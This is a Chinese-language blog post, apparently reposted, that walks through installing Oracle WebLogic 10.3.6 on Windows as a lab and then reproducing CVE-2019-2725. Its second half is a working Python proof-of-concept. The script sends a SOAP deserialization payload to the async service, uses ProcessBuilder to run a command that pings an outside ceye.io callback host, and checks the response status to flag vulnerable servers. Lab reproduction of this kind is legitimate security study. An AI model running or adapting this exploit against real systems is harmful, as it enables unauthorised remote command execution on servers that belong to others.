有些坑还是要去踩,上来就docker一脸懵逼。
1、应用
https://www.cnblogs.com/xdp-gacl/p/4140683.html
(1)安装
环境:
64位server2016jdk1.7wls1036_generic.jar(11g)
下载好jar,之后执行 java -D64 -jar wls1036_generic.jar
下一步
ps:之后出现的邮件和代理请忽略
典型安装类型,下一步
找到本地jdk的安装路径,下一步
安装路径,下一步。安装概要,下一步,之后就会安装。
安装完成
(2)Quickstart配置
开始吧
新建域,下一步
域源不管,直接下一步。设置域名,域位置,这里默认,也不管。设置管理员用户名和密码,下一步。
选择模式和jdk,这里选择生产模式
可选配置先选管理服务器(中间件负载那些目前本菜鸡还没摸到,先不管),下一步
设置监听地址和端口和ssl,下一步
路径(如果改了路径,请找下):C:\Oracle\Middleware\user_projects\domains\base_domain下有个启动脚本bat,直接双击,之后输入账号密码。
或者找到快捷方式启动Start Admin Server for Weblogic Server Domain,之后输入账号密码。
之后访问http://ip:port/console,看见控制台即可。部署war
参考:https://www.cnblogs.com/xiaozi/p/9214345.html
2、漏洞复现
(1)CVE-2019-2725/CNVD-C-2019-48814
#coding:utf-8
import requests
#平台不同,路径不同问题。
url="http://192.168.152.131:7001"
path='/_async/AsyncResponseService'
header={'content-type':'text/xml'}
#假设机器通外网
payload1='''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping 236136123.xxxx.ceye.io</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''
try:
rep=requests.get(url+path,timeout=3)
if rep.status_code==200:
r=requests.post(url+path,headers=header,data=payload1,timeout=3)
if r.status_code==202:
print url,"----","可能存在wls9-async组件反序列化漏洞"
except Exception as e:
print "error"
#参考
#https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961
#https://www.t00ls.net/thread-50968-1-1.html
#回显poc https://xz.aliyun.com/t/5299
转载于:https://www.cnblogs.com/nobgr/p/10776802.html